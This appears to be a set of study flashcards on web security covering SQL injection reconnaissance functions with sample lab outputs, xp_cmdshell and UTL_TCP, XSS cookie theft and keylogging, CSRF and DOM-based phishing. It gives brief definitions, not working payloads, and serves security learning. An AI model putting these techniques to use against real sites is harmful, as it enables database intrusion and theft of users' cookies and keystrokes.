Web Security Pt. 2 Flashcards

1
Q

What is SQLi?

A

SQL Injection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is SQLi caused by?

A

missing input validation and app-generates queries containing user-fed input

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What info does user() retreive?

A

root@localhost

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What info does database() retrieve?

A

‘nowasp’

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What info does @@version retrieve?

A

‘5.7.19’

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What info does @@hostname retrieve?

A

‘dbmachine’

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What info does @@datadir retrieve?

A

‘/usr/local/var/mysql/’

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

When does In-band SQLi occur?

A

when we use the same channel to launch attacks and gather the results (error based, union based)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

When does out-of-band SQLi occur?

A

when the attacker has to use different channel to gather their results

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What does xp_cmdshell do?

A

allows the execution of commands

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What does UTL_TCP do?

A

enables SQL to topen a communication channel with external TCP/IP-based servers using tcp/ip

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What does XSS exploit?

A

the trust a user has for a website

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What does CSRF exploit?

A

the trust of a website towards a user

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What is cookie theft?

A

the attacker can access the victims cookies associated with the website using document.cookie

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What is keylogging?

A

the attacker can track a keyboard using addEventListener and then send all of the users keystrokes to the attacker

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is phising?

A

the attacker fabricates a login form into the page using DOM manipulation